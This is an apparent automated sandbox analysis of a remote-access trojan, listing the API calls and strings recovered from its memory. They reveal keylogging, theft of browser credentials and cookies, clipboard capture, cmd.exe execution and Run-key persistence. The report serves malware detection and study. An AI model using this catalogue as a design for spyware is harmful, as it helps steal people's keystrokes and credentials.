                                                                                  • CloseHandle.KERNEL32(?), ref: 004051AA
                                                                                  • SetEvent.KERNEL32(?), ref: 004051B9
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                  • String ID: Connection Timeout
                                                                                  • API String ID: 2055531096-499159329
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                  • API String ID: 2005118841-1866435925
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID: /C $cmd.exe$open
                                                                                  • API String ID: 587946157-3896048727
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                  Strings
                                                                                  • http\shell\open\command, xrefs: 00412026
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: http\shell\open\command
                                                                                  • API String ID: 3677997916-1487954565
                                                                                  APIs
                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
                                                                                  • RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1818849710-4028850238
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                                                    • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                                                    • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                                                                  Similarity
                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                  • String ID: bad locale name
                                                                                  • API String ID: 3628047217-1405518554
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                  • API String ID: 1646373207-2714051624
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                  • API String ID: 2574300362-1519888992
                                                                                  APIs
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                  APIs
                                                                                  Strings
                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                                                                  • Cleared browsers logins and cookies., xrefs: 0040B036
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                  APIs
                                                                                    • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                                    • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                                    • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                  • String ID: H"G$exepath$!G
                                                                                  APIs
                                                                                    • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                                                    • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                                                    • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040955A
                                                                                  • Sleep.KERNEL32(00000064), ref: 004095F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                  • String ID: [ $ ]
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                                                                  • GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  APIs
                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                                                    • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__start
                                                                                  • String ID: pow
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                                                    • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                    • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                    • Part of subcall function 0041A20F: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                  • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                                                                  Strings
                                                                                  • /sort "Visit Time" /stext ", xrefs: 00404092
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                  • String ID: /sort "Visit Time" /stext "
                                                                                  APIs
                                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                  • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer__onexit
                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                  APIs
                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ACP$OCP
                                                                                  APIs
                                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                                                                  • IsWindowVisible.USER32(?), ref: 00415B37
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: Window$TextVisible
                                                                                  • String ID: (%G
                                                                                  • API String ID: 1670992164-3377777310
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                                                                  Strings
                                                                                  • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                  • API String ID: 481472006-507513762
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                                                                  • ___raise_securityfailure.LIBCMT ref: 00432E76
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: (F
                                                                                  • API String ID: 3761405300-3109638091
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                  • API String ID: 481472006-2430845779
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: alarm.wav$x(G
                                                                                  • API String ID: 1174141254-2413638199
                                                                                  APIs
                                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • CloseHandle.KERNEL32(?), ref: 00409FFD
                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040A010
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                  • String ID: Online Keylogger Stopped
                                                                                  • API String ID: 1623830855-1496645233
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                  • API String ID: 1174141254-2800177040
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                  • API String ID: 1174141254-4188645398
                                                                                  APIs
                                                                                  • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ExistsFilePath
                                                                                  • String ID: AppData$\Opera Software\Opera Stable\
                                                                                  • API String ID: 1174141254-1629609700
                                                                                  APIs
                                                                                  • GetKeyState.USER32(00000011), ref: 0040A597
                                                                                    • Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                                    • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                    • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                    • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                                                    • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                                                    • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                  • String ID: [AltL]$[AltR]
                                                                                  • API String ID: 3195419117-2658077756
                                                                                  APIs
                                                                                  • GetKeyState.USER32(00000012), ref: 0040A5F1
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: State
                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                  • API String ID: 1649606143-2446555240
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
                                                                                  • RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420
                                                                                  Similarity
                                                                                  • API ID: DeleteOpenValue
                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                  • API String ID: 2654517830-1051519024
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064
                                                                                    • Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433072
                                                                                    • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                  • String ID: P@
                                                                                  • API String ID: 1586462112-676759640
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044
                                                                                    • Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433052
                                                                                    • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                  • String ID: P@
                                                                                  • API String ID: 1586462112-676759640
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                                                                  • GetLastError.KERNEL32 ref: 0043B4E9
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1717984340-0
                                                                                  APIs
                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
                                                                                  • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 4100373531-0